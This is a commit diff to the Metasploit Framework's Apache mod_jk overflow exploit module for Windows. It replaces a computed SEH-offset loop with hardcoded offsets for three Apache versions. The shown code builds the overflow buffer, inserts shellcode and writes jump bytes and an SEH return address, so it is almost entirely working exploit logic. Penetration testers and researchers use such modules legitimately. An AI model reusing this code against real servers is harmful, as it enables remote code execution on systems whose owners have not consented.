Patch from Nicob

git-svn-id: file:///home/svn/framework3/trunk@4970 4d416f70-5f16-0410-b530-b9f4589650da
2007-05-28 12:38:52 +00:00 · 2007-05-28 12:38:52 +00:00 · 8f8f5d799c
parent 59ba9f10bd
commit 8f8f5d799c
1 changed files with 4 additions and 7 deletions
--- a/modules/exploits/windows/http/apache_modjk_overflow.rb
+++ b/modules/exploits/windows/http/apache_modjk_overflow.rb
@ -73,17 +73,14 @@ class Exploits::Windows::Http::Apache_Mod_JK < Msf::Exploit::Remote
 		sploit     = Rex::Text.rand_text_alphanumeric(5001, payload_badchars)
 		sploit[sc_base, shellcode.length] = shellcode

-		# 16 : Apache/1.3.37 (Win32) mod_jk/1.2.20
-		# 20 : Apache/2.0.59 (Win32) mod_jk/1.2.20
-		# 21 : Apache/2.2.3  (Win32) mod_jk/1.2.20
+		# 4343 : Apache/1.3.37 (Win32) mod_jk/1.2.20
+		# 4407 : Apache/2.0.59 (Win32) mod_jk/1.2.20
+		# 4423 : Apache/2.2.3  (Win32) mod_jk/1.2.20
 	 
-		seh_base = 4087
-		[ 16, 20, 21 ].each { |x|
-			seh_offset = seh_base + (16 * x)
+		[ 4343, 4407, 4423 ].each { |seh_offset|
 			sploit[seh_offset - 9, 5] = "\xe9" + [sc_base - seh_offset + 4].pack('V')
 			sploit[seh_offset - 4, 2] = "\xeb\xf9"
 			sploit[seh_offset    , 4] = [ target.ret ].pack('V')
-			print_status("Inserting custom SEH at offset #{seh_offset} ...")
 		}
 		
 		print_status("Trying target #{target.name}...")